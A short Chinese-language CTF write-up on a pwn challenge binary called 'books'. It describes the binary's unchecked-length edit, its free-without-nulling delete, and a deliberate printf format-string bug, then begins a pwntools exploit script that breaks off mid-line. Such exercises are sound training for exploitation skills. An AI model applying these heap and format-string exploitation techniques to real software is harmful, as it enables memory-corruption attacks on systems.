网络上两篇非常优秀的大佬的详细过程
https://blog.csdn.net/qq_43449190/article/details/89077783
https://bbs.pediy.com/thread-246783.htm
仅记payload
该文件有五个函数:
- Edit order 1
- Edit order 2
- Delete order 1
- Delete order 2
- Submit
其中,Edit order对之前申请的空间进行输入,但是没检查长度
Delete order对之前申请的空间执行free操作,但是没有把指针清空
最后还有一个 printf(dst)
专门构造了一个格式化字符串漏洞
#coding:utf-8
from pwn import *
context(arch='amd64',os='linux')
context.log_level = 'debug'
io = process("./books")
p = ELF("./books")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def edit(index,content):
io.recvuntil("Submit\n")
io.sendline(str(index))
io.recvuntil("order:\n")
io.sendline(content)
def delete(index):
io.recvuntil("Submit\n")
io.sendline(